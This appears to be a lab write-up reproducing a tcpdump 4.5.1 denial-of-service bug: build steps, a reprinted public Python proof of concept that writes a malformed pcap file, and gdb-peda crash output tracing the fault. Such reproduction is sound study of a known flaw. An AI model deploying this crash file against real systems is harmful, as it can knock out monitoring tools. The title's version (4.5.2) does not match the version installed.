tcpdump4.5.2拒绝服务漏洞

# 卸载默认安装的tcpdump
apt-get --purge remove tcpdump  
# 安装依赖包
apt install flex
apt install bison
# 安装libpcap
wget http://www.tcpdump.org/release/libpcap-1.5.3.tar.gz
tar -zxvf libpcap-1.5.3.tar.gz
cd libpcap-1.5.3
./configure
make
make install
# 安装tcpdump
wget http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
tar -zxvf tcpdump-4.5.1.tar.gz
cd tcpdump-4.5.1
./configure
make
make install
# 验证安装
tcpdump --version

gdb
下载
wget http://ftp.gnu.org/gnu/gdb/gdb-11.2.tar.gz
解压
tar -zxvf gdb-11.2.tar.gz
生成makefile文件
./configure
检查文件
make
安装
sudo make install
验证
gdb -v

peda
git clone https://github.com/longld/peda.git ~/peda 
echo "source ~/peda/peda.py" >> ~/.gdbinit

# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: http://www.tcpdump.org
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS
 
from subprocess import call
from shlex import split
from time import sleep
 
def crash():
 
    command = 'tcpdump -r crash'
 
    buffer     =   '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
    buffer     +=  '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
    buffer     +=  '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
    buffer     +=  '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
    buffer     +=  "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
    buffer     +=  "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
    buffer     +=  '\x00\x00\x00\x00\x01\x03\x03\x04'
 
    with open('crash', 'w+b') as file:
        file.write(buffer)
 
    try:
        call(split(command))
        print("Exploit successful!             ")
    except:
        print("Error: Something has gone wrong!")
 
def main():
 
    print("Author:   David Silveiro                           ")
    print("   tcpdump version 4.5.1 Access Violation Crash    ")
 
    sleep(2)
    crash()
 
if __name__ == "__main__":
    main()

python2 poc.py

Exploit successful!  

root@kali:~/tcpdump-dos# gdb tcpdump
 
gdb-peda$ run -r crash

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x7ffef2b3 
EBX: 0x51cff4 --> 0x11ce70 
ECX: 0x2e ('.')
EDX: Cannot access memory address
ESI: 0x5 
EDI: 0x0 
EBP: 0xbfffdbdd ("......")
ESP: 0xbfffdb60 --> 0xf375846 
EIP: 0x41a6cc (<hex_and_ascii_print_with_offset+156>:   movzx  esi,BYTE PTR [edx+0x1])
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x41a6bf <hex_and_ascii_print_with_offset+143>:      mov    eax,DWORD PTR [esp+0x14]
   0x41a6c3 <hex_and_ascii_print_with_offset+147>:      cmp    eax,0xffffffff
   0x41a6c6 <hex_and_ascii_print_with_offset+150>:      je     0x41a7c7 <hex_and_ascii_print_with_offset+407>
=> 0x41a6cc <hex_and_ascii_print_with_offset+156>:      movzx  esi,BYTE PTR [edx+0x1]
   0x41a6d0 <hex_and_ascii_print_with_offset+160>:      movzx  edi,BYTE PTR [edx]
   0x41a6d3 <hex_and_ascii_print_with_offset+163>:      add    edx,0x2
   0x41a6d6 <hex_and_ascii_print_with_offset+166>:      sub    esp,0xc
   0x41a6d9 <hex_and_ascii_print_with_offset+169>:      mov    DWORD PTR [esp+0x2c],edx
[------------------------------------stack-------------------------------------]                                                                          
0000| 0xbfffdb60 --> 0xf375846 
0004| 0xbfffdb64 --> 0xb7fc34a0 --> 0xb7c00000 --> 0x464c457f 
0008| 0xbfffdb68 --> 0xb7c09934 --> 0x0 
0012| 0xbfffdb6c --> 0xbfffdbc3 --> 0x30303000 ('')
0016| 0xbfffdb70 --> 0x5 
0020| 0xbfffdb74 --> 0x7ffef2b3 
0024| 0xbfffdb78 --> 0x0 
0028| 0xbfffdb7c --> 0x0 
[------------------------------------------------------------------------------]                                                                          
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
hex_and_ascii_print_with_offset (ident=0x4aadef "\n\t", cp=0x610000 <error: Cannot access memory at address 0x610000>, length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
90                      s1 = *cp++;

gdb-peda$ bt
#0  hex_and_ascii_print_with_offset (ident=0x4aadef "\n\t", 
    cp=0x610000 <error: Cannot access memory at address 0x610000>, 
    length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
#1  0x0041a8d6 in hex_and_ascii_print (ident=0x4aadef "\n\t", 
    cp=0x5ee575 "\377\377\377\347\067\020\340\377\377\377\377\350'\017\360\377\377\377\377\351\026\362\340\377\377\377\377\352\006\361\360\377\377\377\377\352\366\324\340\377\377\377\377\353\346\323\360\377\377\377\377\354\340\021", length=0xfffffff3) at ./print-ascii.c:127
#2  0x0046dd13 in ndo_default_print (ndo=0x5ea9c0 <Gndo>, 
    bp=0x5ee575 "\377\377\377\347\067\020\340\377\377\377\377\350'\017\360\377\377\377\377\351\026\362\340\377\377\377\377\352\006\361\360\377\377\377\377\352\366\324\340\377\377\377\377\353\346\323\360\377\377\377\377\354\340\021", length=0xfffffff3) at ./tcpdump.c:2053
#3  0x0041850c in ieee802_15_4_if_print (ndo=0x5ea9c0 <Gndo>, h=0xbfffde10, 
    p=<optimized out>) at ./print-802_15_4.c:180
#4  0x0046e348 in print_packet (user=0xbfffdef0 "\300\251^", h=0xbfffde10, 
    sp=0x5ee560 "@\377") at ./tcpdump.c:1950
#5  0x004905ef in pcap_offline_read (p=0x5ee350, cnt=0xffffffff, 
    callback=0x46e2f0 <print_packet>, user=0xbfffdef0 "\300\251^")
    at ./savefile.c:409
#6  0x004808b3 in pcap_loop (p=0x5ee350, cnt=0xffffffff, 
    callback=0x46e2f0 <print_packet>, user=0xbfffdef0 "\300\251^")
    at ./pcap.c:849
#7  0x004119b5 in main (argc=<optimized out>, argv=0xbffff0f4)
    at ./tcpdump.c:1569
#8  0xb7c23295 in ?? () from /lib/i386-linux-gnu/libc.so.6
#9  0xb7c23358 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#10 0x00412747 in _start ()
gdb-peda$ 

gdb-peda$ s

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x7ffef2b3 
EBX: 0x51cff4 --> 0x11ce70 
ECX: 0x2e ('.')
EDX: Cannot access memory address
ESI: 0x5 
EDI: 0x0 
EBP: 0xbfffdbdd ("......")
ESP: 0xbfffdb60 --> 0xf375846 
EIP: 0x41a6cc (<hex_and_ascii_print_with_offset+156>:   movzx  esi,BYTE PTR [edx+0x1])
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x41a6bf <hex_and_ascii_print_with_offset+143>:      mov    eax,DWORD PTR [esp+0x14]
   0x41a6c3 <hex_and_ascii_print_with_offset+147>:      cmp    eax,0xffffffff
   0x41a6c6 <hex_and_ascii_print_with_offset+150>:      je     0x41a7c7 <hex_and_ascii_print_with_offset+407>
=> 0x41a6cc <hex_and_ascii_print_with_offset+156>:      movzx  esi,BYTE PTR [edx+0x1]
   0x41a6d0 <hex_and_ascii_print_with_offset+160>:      movzx  edi,BYTE PTR [edx]
   0x41a6d3 <hex_and_ascii_print_with_offset+163>:      add    edx,0x2
   0x41a6d6 <hex_and_ascii_print_with_offset+166>:      sub    esp,0xc
   0x41a6d9 <hex_and_ascii_print_with_offset+169>:      mov    DWORD PTR [esp+0x2c],edx
[------------------------------------stack-------------------------------------]                                                                          
0000| 0xbfffdb60 --> 0xf375846 
0004| 0xbfffdb64 --> 0xb7fc34a0 --> 0xb7c00000 --> 0x464c457f 
0008| 0xbfffdb68 --> 0xb7c09934 --> 0x0 
0012| 0xbfffdb6c --> 0xbfffdbc3 --> 0x30303000 ('')
0016| 0xbfffdb70 --> 0x5 
0020| 0xbfffdb74 --> 0x7ffef2b3 
0024| 0xbfffdb78 --> 0x0 
0028| 0xbfffdb7c --> 0x0 
[------------------------------------------------------------------------------]                                                                          
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
hex_and_ascii_print_with_offset (ident=0x4aadef "\n\t", cp=0x610000 <error: Cannot access memory at address 0x610000>, length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
90                      s1 = *cp++;
gdb-peda$